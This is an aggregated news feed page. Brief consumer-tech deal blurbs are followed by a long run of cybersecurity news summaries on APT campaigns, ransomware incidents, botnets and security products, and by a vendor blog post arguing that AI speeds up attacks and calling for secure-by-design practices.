Lenovo's ThinkPad T14s Gen 6 is a top-notch work laptop with a long-lasting battery and solid performance. For a limited time, multiple configurations are on sale.
I tested the best robot vacuums for pet hair from iRobot, Roborock, and more to effortlessly keep your floors clean without the old upright vacuum.
We went hands-on with the best robot mowers that can cut your lawn regularly, so you can kick back and relax this spring.
If your next Disney+ binge can also score you a potential four-night Disney cruise or a host of other perks, streaming just got a lot more interesting.
Here are the best laptop docking stations we've gone hands-on with to tidy up your workspace.
Now in beta, the new feature allows you to pull up detailed information in a video without leaving the YouTube app.
The Onyx Boox Page delivers a rich feature set for an E Ink tablet, all housed within an equally noteworthy design.
Samsung phones are brimming with useful features, but are you taking advantage of them?
At Red Hat Summit and Ansible Fest 2025, discussions included open source, automation, security, and, of course, AI - but in a refreshing way.
Stuck in a game on Xbox? Copilot is here to help.
Log a 5K (or more!) on June 4 and unlock an exclusive badge.
Amazon's Prime Day sale is back this July. Here's everything you need to know.
HP's EliteBook Ultra G1i is impressively lightweight, reliably powerful, and built to last on battery life. But there's more to it.
Here's a breakdown of several methods you can use to clear your Roku TV cache and boost performance in just minutes.
Forget tool kits and socks -- these top gadgets from smart wearables to thermometers will make the perfect gift for dad, no matter how tech-savvy he is (or isn't).
Ever wonder what your street looked like in the 1980s - or even the 30s? With Google Earth's historical imagery feature, you can view almost any location as it would've appeared throughout time.
Need an early Father's Day gift or just looking to expand your toolbox? The Home Depot is currently offering the 77-piece Milwaukee SAE/Metric combination wrench and socket set for 27% off.
Yes, you can be productive from the couch. This lap desk is packed with intentional features that make it great for gamers and workers alike.
Firebase, Google Apps Script Abused in Fresh Phishing Campaigns (SecurityWeek): Security researchers flag two phishing campaigns abusing Firebase and Google Apps Script to host malware and fake login pages.
US Sanctions Philippine Company for Supporting Crypto Scams (SecurityWeek): The US Treasury Department has slapped sanctions on Funnull Technology for providing support to cryptocurrency investment scams.
Watch Now: Why Context is a Secret Weapon in Application Security Posture Management (SecurityWeek): Join the live webinar to understand why data in itself is not enough to make informed decisions for prioritization.
Chinese Hacking Group APT41 Exploits Google Calendar to Target Governments (SecurityWeek): China-linked hackers used a compromised government site to target other government entities with the ToughProgress malware that uses an attacker-controlled Google Calendar for C&C.
MITRE Publishes Post-Quantum Cryptography Migration Roadmap (SecurityWeek): The roadmap provides an overview of four key stages of the migration process, namely preparation, baseline understanding, planning and execution, and monitoring and evaluation.
ConnectWise Discloses Suspected State-Sponsored Hack (SecurityWeek): The IT software provider says ScreenConnect users were impacted by the attack, which exploited a high-severity ASP.NET vulnerability.
CISA Releases Guidance on SIEM and SOAR Implementation (SecurityWeek): The guidance outlines the benefits and challenges of SIEM and SOAR platforms, and shares implementation recommendations.
Chinese Hacking Group ‘Earth Lamia’ Targets Multiple Industries (SecurityWeek): Active since at least 2023, the hacking group has been targeting the financial, government, IT, logistics, retail, and education sectors.
Unbound Raises $4 Million to Secure Gen-AI Adoption (SecurityWeek): Security startup Unbound has raised $4 million in funding to help organizations adopt generative-AI tools securely and responsibly.
GreyNoise Flags 9,000 ASUS Routers Backdoored Via Patched Vulnerability (SecurityWeek): Professional hackers have built a network of ASUS routers that can survive firmware upgrades, factory reboots and most anti-malware scans.
ConnectWise has brought in the big guns to investigate a "sophisticated nation state actor" that broke into its IT environment and then breached some of its customers.…
A Defense Intelligence Agency (DIA) IT specialist is scheduled to appear in court today after being caught by the FBI trying to surreptitiously drop top secret information to a foreign government in a public park.…
A Seattle cancer facility has agreed to fork out around $52.5 million as part of a class action settlement linked to a Thanksgiving 2023 cyberattack where criminals directly threatened cancer patients with swat attacks.…
Meta has partnered with Anduril Industries to build augmented and virtual reality devices for the military, eight years after it fired the defense firm's founder, Palmer Luckey.…
Criminals are using installers for fake AI software to distribute ransomware and other destructive malware.…
The UK’s data watchdog has reprimanded Greater Manchester Police (GMP) force for losing CCTV footage the cop shop was later requested to retain.…
The UK is spending more than £1 billion ($1.35 billion) setting up a new Cyber and Electromagnetic Command and is recruiting a few good men and women to join up and staff it.…
Partner content: Infosecurity Europe celebrates its 30th anniversary by doubling down on its mission: Building a Safer Cyber World. Returning to ExCeL London from 3-5 June, the landmark edition of Europe's most influential cybersecurity event is set to be its most ambitious yet. With global cyberthreats mounting in scale and sophistication, the 2025 show will deliver strategic insight, practical training, and powerful connections across three days of expert content and community collaboration.…
Security services vendor SentinelOne experienced a major outage on Thursday.…
The US Treasury has sanctioned a Philippine company and its administrator after linking them to the infrastructure behind the majority of so-called "pig butchering" scams reported to the FBI.…
Microsoft's latest Patch Tuesday update is failing to install on some Windows 11 machines, mostly virtual ones, and dumping them into recovery mode with a boot error. Its only recommendation to avoid the problem for now is to dodge the update.…
Chinese government spies burrowed deep into American telecommunications systems and critical infrastructure networks for one reason, according to retired US Army Lt. Gen. H.R. McMaster.…
Thousands of Asus routers are currently ensnared by a new botnet that is trying to disable Trend Micro security features before exploiting vulnerabilities for backdoor access.…
A VPN vendor says billions of stolen cookies currently on sale either on dark web or Telegram-based marketplaces remain active and exploitable.…
The European Commission (EC) has kicked off a scheme to make Europe a better place to nurture global technology businesses, providing support throughout their lifecycle, from startup through to maturity.…
Underwear retailer Victoria's Secret’s website has been down for three days, with the company blaming an unspecified security problem.…
Sponsored Post: From the use of ATMs to online banking, the financial services sector has always been at the forefront of technology. Now, it's leading the charge in AI. In their third annual survey of financial institutions the Bank of England and Financial Conduct Authority found 75% of companies already using AI with another 10% planning to do so over the next three years.…
LexisNexis Risk Solutions (LNRS) is the latest big-name organization to disclose a serious cyberattack leading to data theft, with the number of affected individuals pegged at 364,333.…
A Russian programmer will face the next 14 years in a "strict-regime" (high-security) penal colony after a regional court ruled he leaked sensitive data to Ukraine.…
Sponsored feature: The IT business likes to reinvent things as quickly as possible. Except passwords, that is. We've been using them since Roman times, only now they're digital. They're the fungal skin disease of tech; irritating and hard to get rid of.…
Updated: DragonForce ransomware infected a managed service provider, and its customers, after attackers exploited security flaws in remote monitoring and management tool SimpleHelp.…
Computex: Analysts rate Taiwan’s ASUS the world’s fifth most prolific PC-maker, but the company wants to climb the charts by targeting business buyers, according to Shawn Chang, Head of Go-To-Market for the outfit’s Commercial Business Unit.…
A group of miscreants tracked as UNC6032 is exploiting interest in AI video generators by planting malicious ads on social media platforms to steal credentials, credit card details, and other sensitive info, according to Mandiant.…
A previously unknown Kremlin-linked group has conducted cyber-espionage operations against Dutch police, NATO member states, Western tech companies, and other organizations of interest to the Russian government since at least April 2024, according to Dutch intelligence services and Microsoft.…
Adidas is warning customers some of their data was stolen after an "unauthorized" person lifted it from a "third-party customer service provider."…
Software biz MathWorks is cleaning up a ransomware attack more than a week after it took down MATLAB, its flagship product used by more than five million people worldwide.…
Infosec In Brief: Secrets of the Trump administration may have been exposed after a successful attack on messaging service TeleMessage, which has been used by some officials.…
Asia In Brief: China last week approved rules that will see Beijing issue identity numbers that netizens can use as part of a federated identity scheme that will mean they can use one logon across multiple online services.…
INTERVIEW: Uncle Sam's cybersecurity apparatus can't only focus on China and other nation-state actors, but also has to fight the much bigger damage from plain old cybercrime, says former White House advisor Michael Daniel. And the Trump administration's steep cuts to federal government staff are making that a lot harder.…
Obituary: John Young, the co-founder of the legendary internet archive Cryptome, died at the age of 89 on March 28. The Register talked to friends and peers who gave tribute to a bright, pugnacious man who was devoted to the public's right to know.…
Nova Scotia Power on Friday confirmed it had been hit by a ransomware attack that began earlier this spring and disrupted certain IT systems, and admitted the crooks leaked data belonging to about 280,000 customers online. The stolen info may have included billing details and, for those on autopay, bank account numbers.…
The Cybersecurity and Infrastructure Security Agency (CISA) is warning that SaaS companies are under fire from criminals on the prowl for cloud apps with weak security.…
A ruthless cyber conman who duped elderly pensioners – including an 80-year-old man – into smuggling deadly class A drugs was this week locked up.…
The US Department of Justice has unsealed indictments against 16 people accused of spreading and using the DanaBot remote-control malware that infected more than 300,000 computers, plus operating a botnet of the same name, and appears set to shutter its operations.…
A suspected Chinese government spy group is behind the rash of attacks that exploit two Ivanti bugs that can be chained together to achieve unauthenticated remote code execution (RCE), according to analysts at threat intelligence outfit EclecticIQ.…
The FBI has filed an affidavit detailing how it identified a US Navy man who was allegedly distributing child sex abuse material (CSAM) through Discord.…
Partner content: Most security teams face a staggering challenge. They're tasked with protecting themselves against the same advanced threats as any large enterprise, but often have a fraction of the budget, tools, and personnel. It's not uncommon to hear these teams being told to "do more with less." But still, the stakes couldn't be higher.…
Uncle Sam on Thursday unsealed criminal charges and a civil forfeiture case against a Russian national accused of leading the cybercrime ring behind Qakbot, the notorious malware that infected hundreds of thousands of computers worldwide and helped fuel ransomware attacks costing victims tens of millions of dollars.…
A suspected Chinese crew has been exploiting a now-patched remote code execution (RCE) flaw in Trimble Cityworks to break into US local government networks and target utility management systems, according to Cisco's Talos threat intelligence group.…
The Irish Data Protection Commission has cleared the way for Meta to begin slurping up the data of European citizens for training AI next week, ongoing legal challenges notwithstanding.…
Foreigners in Moscow will now be subject to a new experimental law that affords the state enhanced tracking mechanisms via a smartphone app.…
Chat app biz Signal is unhappy with the current version of Microsoft Recall and has invoked some Digital Rights Management (DRM) functionality in Windows to stop the tool from snapshotting private conversations.…
Scotland's West Lothian Council has confirmed that data was stolen from its education network after the Interlock ransomware group claimed responsibility for the intrusion earlier this month.…
A 19-year-old student has agreed to plead guilty to hacking into the systems of two companies as part of an extortion scheme, and The Register has learned that one of the targets was PowerSchool.…
Russian cyberspies have targeted "dozens" of Western and NATO-country logistics providers, tech companies, and government orgs providing transport and foreign assistance to Ukraine, according to a joint government announcement issued Wednesday.…
International cops working with Microsoft have shut down infrastructure and seized web domains used to run a distribution service for info-stealing malware Lumma. Criminals paid $250 to $1,000 a month to get access to the infostealer.…
Coinbase says the data of nearly 70,000 customers was handed over by overseas support staff who were bribed by criminals to give up the goods.…
CrowdStrike is "confident" that the worst-case scenario of its pending lawsuit with Delta will result in it paying the airline a sum in the "single-digit millions."…
Google has updated its sovereign cloud services, including an air-gapped solution for customers with strict data security and residency requirements, as customers grow uneasy over US digital dominance.…
In a White House press conference on Tuesday President Trump announced his plans for a defensive network of missiles, radar, space surveillance, and attack satellites that he promised would protect America.…
Australian firms with an annual turnover of AUS $3m are now required to report any payments to ransomware groups to authorities
Five major banking associations in the US claim the new SEC cyber incident disclosure rule puts a strain on their resources
The FBI provided details of Funnull’s malicious activities, selling infrastructure to criminal groups to facilitate cryptocurrency fraud in the US
The UK MoD has unveiled a new Cyber and Electromagnetic Command, which will focus on offensive cyber operations and “electromagnetic warfare” capabilities
Security teams should use vulnerability context alongside KEV lists to prioritize patching, OX argued
The firm’s remote monitoring management tool, ScreenConnect, has reportedly been patched
Fullscreen Browser-in-the-Middle attacks are making it harder for users to detect malicious websites
Fortinet has identified a new Windows RAT operating stealthily on compromised systems with advanced evasion techniques
A threat actor has used ASUS routers’ legitimate features to create persistent backdoors that survive firmware updates and reboots
A new EY report found that cybersecurity teams are a major vehicle for business growth, and CISOs should push for a seat at the top table
EasyDMARC found that just 7.7% of the world’s top 1.8 million email domains have implemented the most stringent DMARC policy
Two NHS England trusts could see highly sensitive patient records exposed
Why privacy in blockchain must start with open source (Help Net Security): Traditionally, trust came from centralized institutions. Banks, payment networks, and clearinghouses are closed systems. Users cannot see the inner workings, but they rely on external audits, government regulation, and long histories of compliance to feel secure. It’s a model that has and continues to work, but it comes with trade-offs, namely: opacity, concentration of power, and limited innovation. A new model of trust: With blockchains and decentralized applications (dApps), a new model of trust has …
Using AI to outsmart AI-driven phishing scams (Help Net Security): Phishing scams used to be filled with awkward wording and obvious grammar mistakes. Not anymore. AI is now making it harder to distinguish what is real. According to Cofense, email-based scams surged 70% year over year, driven by AI’s ability to automate lures, spoof internal conversations, and bypass spam filters with subtle text variations. Criminals use AI algorithms to analyze large amounts of data to understand the interests, behavior, and preferences of their target. For …
AI agents have access to key data across the enterprise (Help Net Security): 82% of organizations already use AI agents, but only 44% of organizations report having policies in place to secure them, according to SailPoint. While 53% are in the process of developing such policies, the reality is that most remain exposed today. AI agents pose security risks for organizations: 96% of technology professionals consider AI agents a growing risk, even as 98% of organizations plan to expand their use of them within the next year. The …
Exchange 2016, 2019 support ends soon: What IT should do to stay secure (Help Net Security): Microsoft is ending support for Exchange Server 2016, Exchange Server 2019, and Outlook 2016 on October 14, 2025. That date might seem far off, but if you’re managing email systems or Office deployments, it’s worth paying attention to now. These products will keep working past that deadline, but without security updates or tech support, they’ll be risky to keep in production. What’s ending and when? The key date to remember is October 14, 2025. On …
Infosec products of the month: May 2025 (Help Net Security): Here’s a look at the most interesting products from the past month, featuring releases from: Anchore, BalkanID, Cyble, groundcover, Hunted Labs, LogicGate, McAfee, Obsidian Security, Outpost24, PentestPad, ProcessUnity, Resecurity, Searchlight Cyber, SecuX, ServiceNow, ThreatMark, and Verosint. New MCP server from groundcover redefines LLM observability: A new MCP server, faster than any other on the market, has been launched from groundcover, the eBPF-driven observability platform. Developers can now enhance their AI-driven workflows with deep system context, …
Microsoft unveils “centralized” software update tool for Windows (Help Net Security): Microsoft is looking to streamline the software updating process for IT admins and users by providing a Windows-native update orchestration platform, and to help organizations upgrade their computer fleet to Windows 11 with the help of Windows Backup for Organizations. The software update orchestration platform: “Today, line-of-business apps, Windows components, Visual Studio, and other products are updated independently,” says Microsoft Product Manager Angie Chen. “Updates across the Windows ecosystem can feel like a fragmented experience …
Resecurity Compliance Manager empowers cybersecurity leaders with AI-driven insights (Help Net Security): Resecurity has officially launched its AI-driven Compliance Manager. The solution is engineered to help CISOs and compliance teams manage complex regulatory demands, reduce risk, and maintain alignment with global cybersecurity standards. The Compliance Manager delivers centralized visibility, automation, and expert-level guidance to ensure organizations stay audit-ready and resilient in the face of expanding data protection and information security regulations. The platform currently supports over 20 international and regional compliance frameworks, including: GDPR (General Data Protection …
Cisco Duo IAM protects against AI-driven identity threats (Help Net Security): Cisco unveiled Duo Identity and Access Management (IAM), a new security solution that transforms how organizations combat persistent identity-based attacks that are accelerating in the AI era. Identity is a prime target for bad actors, accounting for 60% of Cisco Talos Incident Response cases in 2024, because current solutions have critical weaknesses that attackers exploit. Duo IAM offers an innovative and security-first approach, with added protection built on its globally trusted multifactor authentication (MFA). Duo IAM …
What CISOs can learn from the frontlines of fintech cybersecurity (Help Net Security): At Span Cyber Security Arena, I sat down with Ria Shetty, Director, Cyber Security & Resilience for Europe at Mastercard. Our conversation cut through the hype and focused on what CISOs deal with every day: how to embed security into innovation, manage supply chain risk, and prepare both systems and people for the threats ahead. For Shetty, the idea that innovation competes with security is a false choice. “They go hand in hand,” she says. …
How CISOs can regain ground in the AI fraud war (Help Net Security): Fraudsters are winning the AI arms race, first-party fraud is rising, and siloed systems are holding back defenses, according to DataVisor. Their 2025 Fraud & AML Executive Report, based on surveys of banks, fintechs, credit unions, and digital platforms, outlines clear signals for CISOs trying to build resilient, forward-looking strategies. Fraudsters have the upper hand. The most urgent issue? Criminals are using AI better than most organizations. Three in four respondents said fraudsters currently have …
Cybercriminals impersonate the trusted e-signature brand and send fake Docusign notifications to trick people into giving away their personal or corporate data
ESET Research has been tracking Danabot’s activity since 2018 as part of a global effort that resulted in a major disruption of the malware’s infrastructure
ESET Research shares its findings on the workings of Danabot, an infostealer recently disrupted in a multinational law enforcement operation
The bustling cybercrime enterprise has been dealt a significant blow in a global operation that relied on the expertise of ESET and other technology companies
Our intense monitoring of tens of thousands of malicious samples helped this global disruption operation
ESET Chief Security Evangelist Tony Anscombe highlights key findings from the latest issue of the ESET APT Activity Report
An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q4 2024 and Q1 2025
Operation RoundPress targets webmail software to steal secrets from email accounts belonging mainly to governmental organizations in Ukraine and defense contractors in the EU
ESET researchers uncover a Russia-aligned espionage operation targeting webmail servers via XSS vulnerabilities
Ever wondered why a lie can spread faster than the truth? Tune in for an insightful look at disinformation and how we can fight one of the most pressing challenges facing our digital world.
Here’s a brief dive into the murky waters of shape-shifting attacks that leverage dedicated phishing kits to auto-generate customized login pages on the fly
When we get the call, it’s our legal responsibility to attend jury service. But sometimes that call won’t come from the courts – it will be a scammer.
Have you received a text message about an unpaid road toll? Make sure you’re not the next victim of a smishing scam.
From the power of collaborative defense to identity security and AI, catch up on the event's key themes and discussions
ESET researchers analyzed Spellbinder, a lateral movement tool used to perform adversary-in-the-middle attacks
From the near-demise of MITRE's CVE program to a report showing that AI outperforms elite red teamers in spearphishing, April 2025 was another whirlwind month in cybersecurity
Your iPhone isn't necessarily as invulnerable to security threats as you may think. Here are the key dangers to watch out for and how to harden your device against bad actors.
Look out for AI-generated 'TikDocs' who exploit the public's trust in the medical profession to drive sales of sketchy supplements
The form and quiz-building tool is a popular vector for social engineering and malware. Here’s how to stay safe.
What practical AI attacks exist today? “More than zero” is the answer – and they’re getting better.
Cybercriminals lure content creators with promises of cutting-edge AI wizardry, only to attempt to steal their data or hijack their devices instead
Here's what to know about malware that raids email accounts, web browsers, crypto wallets, and more – all in a quest for your sensitive data
Academic institutions have a unique set of characteristics that makes them attractive to bad actors. What's the right antidote to cyber-risk?
Here’s how to avoid being hit by fraudulent websites that scammers can catapult directly to the top of your search results
When a ruse puts on a familiar face, your guard might drop, making you an easy mark. Learn how to tell a friend apart from a foe.
Corporate data breaches are a gateway to identity fraud, but they’re not the only one. Here’s a lowdown on how your personal data could be stolen – and how to make sure it isn’t.
The computer scientist and AI researcher shares her thoughts on the technology’s potential and pitfalls – and what may lie ahead for us
From an exploited vulnerability in a third-party ChatGPT tool to a bizarre twist on ransomware demands, it's a wrap on another month filled with impactful cybersecurity news
Your company’s ability to tackle the ransomware threat head-on can ultimately be a competitive advantage
Security awareness training doesn’t have to be a snoozefest – games and stories can help instill ‘sticky’ habits that will kick in when a danger is near
ESET researchers also examine the growing threat posed by tools that ransomware affiliates deploy in an attempt to disrupt EDR security solutions
Once thought to be dormant, the China-aligned group has also been observed using the privately-sold ShadowPad backdoor for the first time
ESET researchers discover new ties between affiliates of RansomHub and of rival gangs Medusa, BianLian, and Play
ESET researchers uncover the toolset used by the FamousSparrow APT group, including two undocumented versions of the group’s signature backdoor, SparrowDoor
ESET researchers detail a global espionage operation by FishMonger, the APT group run by I‑SOON
The group's Operation AkaiRyū begins with targeted spearphishing emails that use the upcoming World Expo 2025 in Osaka, Japan, as a lure
ESET researchers uncovered MirrorFace activity that expanded beyond its usual focus on Japan and targeted a Central European diplomatic institute with the ANEL backdoor
Here's what's been hot on the AI scene over the past 12 months, how it's changing the face of warfare, and how you can fight AI-powered scams
While relatively rare, real-world incidents impacting operational technology highlight that organizations in critical infrastructure can’t afford to dismiss the OT threat
Listen up, this is sure to be music to your ears – a few minutes spent securing your account today can save you a ton of trouble tomorrow
Malicious use of AI is reshaping the fraud landscape, creating major new risks for businesses
By taking time to understand and communicate the impact of undesirable online behavior, you can teach your kids an invaluable set of life lessons for a new digital age
Take a moment to think beyond our current capabilities and consider what might come next in the grand story of evolution
Big shifts in the infostealer scene, novel attack vector against iOS and Android, and a massive surge in investment scams on social media
With AI's pattern recognition capabilities well-established, Mr. Schölkopf's talk shifts the focus to a pressing question: what will be the next great leap for AI?
Ransomware payments trending down, the cyber-resilience gap facing SMBs, and APT groups embracing generative AI – it's a wrap on another month filled with impactful security news
The pioneering multi-media artist reveals the creative process behind her stage show called ARK, which challenges audiences to reflect on some of the most pressing issues of our times
A North Korea-aligned activity cluster tracked by ESET as DeceptiveDevelopment drains victims' crypto wallets and steals their login details from web browsers and password managers
ESET researchers analyzed a campaign delivering malware bundled with job interview challenges
Some employment scams take an unexpected turn as cybercriminals shift from “hiring” to “firing” staff
The atmospheric scientist makes a compelling case for a head-to-heart-to-hands connection as a catalyst for climate action
The virtual treasure chests and other casino-like rewards inside your children’s games may pose risks you shouldn’t play down
Ever wondered what it's like to hack for a living – legally? Learn about the art and thrill of ethical hacking and how white-hat hackers help organizations tighten up their security.
Deepfake fraud, synthetic identities, and AI-powered scams make identity theft harder to detect and prevent – here's how to fight back
As AI advances at a rapid clip, reshaping industries, automating tasks, and redefining what machines can achieve, one question looms large: what remains uniquely human?
Don’t wait for a costly breach to provide a painful reminder of the importance of timely software patching
Left unchecked, AI's energy and carbon footprint could become a significant concern. Can our AI systems be far less energy-hungry without sacrificing performance?
As is their wont, cybercriminals waste no time launching attacks that aim to cash in on the frenzy around the latest big thing – plus, what else to know before using DeepSeek
DeepSeek’s bursting onto the AI scene, apparent shifts in US cybersecurity policies, and a massive student data breach all signal another eventful year in cybersecurity and data privacy
You should think twice before trusting your AI assistant, as database poisoning can markedly alter its output – even dangerously so
The renowned physicist explores how time and entropy shape the evolution of the universe, the nature of existence, and the eventual fate of everything, including humanity
Don’t roll the dice on your online safety – watch out for bogus sports betting apps and other traps commonly set by scammers
Incoming laws, combined with broader developments on the threat landscape, will create further complexity and urgency for security and compliance teams
ESET researchers have discovered a supply-chain attack against a VPN provider in South Korea by a new China-aligned APT group we have named PlushDaemon
Data breaches can cause a loss of revenue and market value as a result of diminished customer trust and reputational damage
ESET researchers uncover a vulnerability in a UEFI application that could enable attackers to deploy malicious bootkits on unpatched systems
The story of a signed UEFI application allowing a UEFI Secure Boot bypass
In the hands of malicious actors, AI tools can enhance the scale and severity of all manner of scams, disinformation campaigns and other threats
Some of the state’s new child safety law can be easily circumvented. Should it have gone further?
As detections of cryptostealers surge across Windows, Android and macOS, it's time for a refresher on how to keep your bitcoin or other crypto safe
The blurring of lines between cybercrime and state-sponsored attacks underscores the increasingly fluid and multifaceted nature of today’s cyberthreats
Seeking to keep sensitive data private and accelerate AI workloads? Look no further than AI PCs powered by Intel Core Ultra processors with a built-in NPU.
The prominent AI researcher explores the societal impact of artificial intelligence and outlines his vision for a future in which AI upholds human rights, dignity, and fairness
From attacks leveraging new zero-day exploits to a major law enforcement crackdown, December 2024 was packed with impactful cybersecurity news
The first Canadian to walk in space dives deep into the origins of space debris, how it’s become a growing problem, and how we can clean up the orbital mess
Take a peek into the murky world of cybercrime where groups of scammers who go by the nickname of 'Neanderthals' wield the Telekopye toolkit to ensnare unsuspecting victims they call 'Mammoths'
ESET's Jake Moore reveals why the holiday season is a prime time for scams, how fraudsters prey on victims, and how AI is supercharging online fraud
While you're enjoying the holiday season, cybercriminals could be gearing up for their next big attack – make sure your company's defenses are ready, no matter the time of year
ESET Chief Security Evangelist Tony Anscombe looks at some of the report's standout findings and their implications for staying secure in 2025
A view of the H2 2024 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research experts
Our ‘computers on wheels’ are more connected than ever, but the features that enhance our convenience often come with privacy risks in tow
Aggregate vulnerability scores don’t tell the whole story – the relationship between a flaw’s public severity rating and the specific risks it poses for your company is more complex than it seems
Could attackers use seemingly innocuous prompts to manipulate an AI system and even make it their unwitting ally?
As cybersecurity is a make-or-break proposition for businesses of all sizes, can your organization's security strategy keep pace with today’s rapidly evolving threats?
Buying a pre-owned phone doesn’t have to mean compromising your security – take these steps to enjoy the benefits of cutting-edge technology at a fraction of the cost
We’re on the cusp of a technological revolution that is poised to transform our lives – and we hold the power to shape its impact
Cybersecurity compliance may feel overwhelming, but a few clear steps can make it manageable and ensure your business stays on the right side of regulatory requirements
ESET's CEO unpacks the complexities of cybersecurity in today’s hyper-connected world and highlights the power of innovation in stopping digital threats in their tracks
Zero days under attack, a new advisory from 'Five Eyes', thousands of ICS units left exposed, and mandatory MFA for all – it's a wrap on another month filled with impactful cybersecurity news
‘Tis the season to be wary – be on your guard and don’t let fraud ruin your shopping spree
ESET researchers make a discovery that signals a shift on the UEFI threat landscape and underscores the need for vigilance against future threats
ESET researchers analyze the first UEFI bootkit designed for Linux systems
The backdoor can execute commands and lets attackers download additional modules onto the victim’s machine, ESET research finds
ESET Research details the analysis of a previously unknown vulnerability in Mozilla products exploited in the wild and another previously unknown Microsoft Windows vulnerability, combined in a zero-click exploit
ESET researchers analyzed previously unknown Linux backdoors that are connected to known Windows malware used by the China-aligned Gelsemium group, and to Project Wood
The veteran of four space missions discusses challenges faced by the Hubble Space Telescope and how human ingenuity and teamwork made Hubble’s success possible
Tired of dodging all those 'Scam Likely' calls? Here's what’s behind the label and how to stay one step ahead of phone scammers.
ESET Chief Security Evangelist Tony Anscombe highlights some of the most intriguing insights revealed in the latest ESET APT Activity Report
ESET researchers introduce the Gamaredon APT group, detailing its typical modus operandi, unique victim profile, vast collection of tools and social engineering tactics, and even its estimated geolocation
Six New York residents were charged with running a complex scheme that involved fraudulent documentation and unauthorized payment systems to steal as much as $30 million from the country's food stamp program that tens of millions of Americans rely on every month.
The post USDA Worker, 5 Others Charged in Food Stamp Fraud Operation appeared first on Security Boulevard.
SentinelOne's commercial customers' consoles went down for about six hours on May 29 in what the company says wasn't a "security incident," but it still faces questions from a customer base that wants to know what happened and why communication from SentinelOne about the issues was bad.
The post SentinelOne Outage Leaves Security Teams Hanging for Six Hours appeared first on Security Boulevard.
Author/Presenter: John-André Bjørkhaug
Our sincere appreciation to BSidesLV, and the Presenters/Authors for publishing their erudite Security BSidesLV24 content. Originating from the conference’s events located at the Tuscany Suites & Casino, and via the organization’s YouTube channel.
The post BSidesLV24 – PasswordsCon – All Your Badge Are Belong To Me appeared first on Security Boulevard.
Five years post-pandemic, half of CISOs at enterprises with revenue of $20 billion or more now hold EVP- or SVP-level titles.
The post Million-dollar Salaries, Board Influence Mark the CISO’s Rise appeared first on Security Boulevard.
The post Vulnerability Management: Hidden Costs, Confidence Shortfalls, and Siloed Processes appeared first on AI Security Automation.
The post Vulnerability Management: Hidden Costs, Confidence Shortfalls, and Siloed Processes appeared first on Security Boulevard.
May 30, 2025 - Timo Rüppell - The Sequential Kill Chain for AI-Powered Attacks
Excerpt: We’ve talked before about Mean Time To Attack, or MTTA, which has grown alarmingly short for new vulnerabilities across the cyber landscape. In this blog, we’ll dive into the “how” and “why” of this…
Summary:
In our current cyber landscape, Mean Time To Attack is shorter than ever, and all signs point to AI being involved. And in the meantime, Mean Time to Patch isn’t getting shorter…
Blog text:
AI security is a critical challenge in 2025. Developers and security experts are struggling to stay ahead of attacks that are continuing to rise in volume and complexity. We’ve seen a rapid increase in the number of breaches and new kinds of attacks, such as indirect prompt injection. Many researchers believe that AI is partially responsible for attacks growing and advancing at such a rapid rate. Mean Time To Attack, or MTTA, is the time it takes for a new vulnerability to be exploited in the wild. In recent years, we’ve seen this number decrease dramatically to only 22 minutes. On the other hand, the Mean Time To Patch, or MTTP, is still extremely long, sitting around 50 to 160 days, which is more than enough time for attackers and bad actors to exploit the vulnerabilities repeatedly and even find more weak spots.
Pictured below is the Sequential Kill Chain for AI-Powered attacks. The early stages of the kill chain (Recon, Weaponize and Deliver, through to Exploit) are occurring at a rate that seems too fast not to be automated in many cases. If hackers had to do each step manually (reconnaissance into APIs or web apps looking for vulnerabilities, figuring out how to exploit them, then building and deploying the code, and delivering these attacks until one of them is successful), it would take a lot longer than 22 minutes, even for the most experienced threat actors. And we already know this is possible from cases like when researchers got ChatGPT 4 to exploit one-day vulnerabilities. They tested this method across 15 different sites, container management software, and Python packages. Their findings were shocking. ChatGPT was able to correctly exploit one-day vulnerabilities 87% of the time. (IBM)
So what does this mean?
Developers and security teams need to work together and stay vigilant and aware of the risks. Since vulnerabilities are being exploited so rapidly, they need to be addressed proactively and the best way to do this is to employ the principles of “secure by design.” “Secure by design,” is effectively the process of eliminating vulnerabilities as you build. There are multiple types of ways to employ “secure by design,” including code analysis and continuous security testing throughout every stage of development. Now more than ever, security needs to be a top concern from code to cloud. We’ve talked before about how secure by design is the best way to enforce security postures before platforms even go live in their environment. But with MTTA sitting so incredibly low, and MTTP remaining high, this construct is even more critical. And unfortunately, it seems like this problem is going to get worse before it gets better. Based on the data, the industry behavior around patching has been consistent for the past two decades. Quite simply, vulnerabilities are not taken seriously enough. There also may be a need down the line for automated deployments that can fix a vulnerability and deploy the patch within minutes, instead of months. One of the best ways to do this is to rely heavily on infrastructure as code, with fully automated pipelines. Once a vulnerability is identified, push the patch in code, and initiate a build and deploy automation. This is the same for both AI security and API security. APIs power the different platforms that provide data to LLMs, so without APIs, there is no AI. Therefore: AI security is API security. And as with vulnerability exploit mitigation, the best way to fix an API is in the security of its design. Analyzing the design for security weaknesses with automated testing during the design and build phase, coupled with automated updates when issues are fixed, leads to the best and most consistent security outcomes.
Takeaways
We are seeing a rapid surge of attacks powered by AI. AI can automate steps of the sequential kill chain, as we’ve already seen with OpenAI, making it much simpler to find, analyse, and exploit vulnerabilities in real-time. For this reason, researchers suspect AI is responsible for the decrease in Mean Time To Attack of vulnerabilities. On the other hand, Mean Time to Patch remains high for vulnerabilities across the board, leaving them open to attack for prolonged periods of time. The only solution is for developers and security teams to stay vigilant by employing practices such as “secure by design,” continuously testing APIs, and patching vulnerabilities proactively, so attackers won’t even have the 22 minutes they need to find and target the weaknesses. Looking for ways to simplify your team’s AI security posture? FireTail can help. Set up a demo or start your free trial today.
The post The Sequential Kill Chain for AI – FireTail Blog appeared first on Security Boulevard.
Author/Presenter: Filipi Pires
Our sincere appreciation to BSidesLV, and the Presenters/Authors for publishing their erudite Security BSidesLV24 content. Originating from the conference’s events located at the Tuscany Suites & Casino, and via the organization’s YouTube channel.
The post BSidesLV24 – PasswordsCon – Cloud Attack: Dissecting Attack Paths With Graph-Mode appeared first on Security Boulevard.
In 2024, enterprise investments in generative AI skyrocketed. Microsoft alone committed over $10 billion to OpenAI, and according to a Gartner report, more than 80%...
The post Why AI Hallucinations Are the Biggest Threat to Gen AI’s Adoption in Enterprises appeared first on ISHIR | Software Development India.
The post Why AI Hallucinations Are the Biggest Threat to Gen AI’s Adoption in Enterprises appeared first on Security Boulevard.
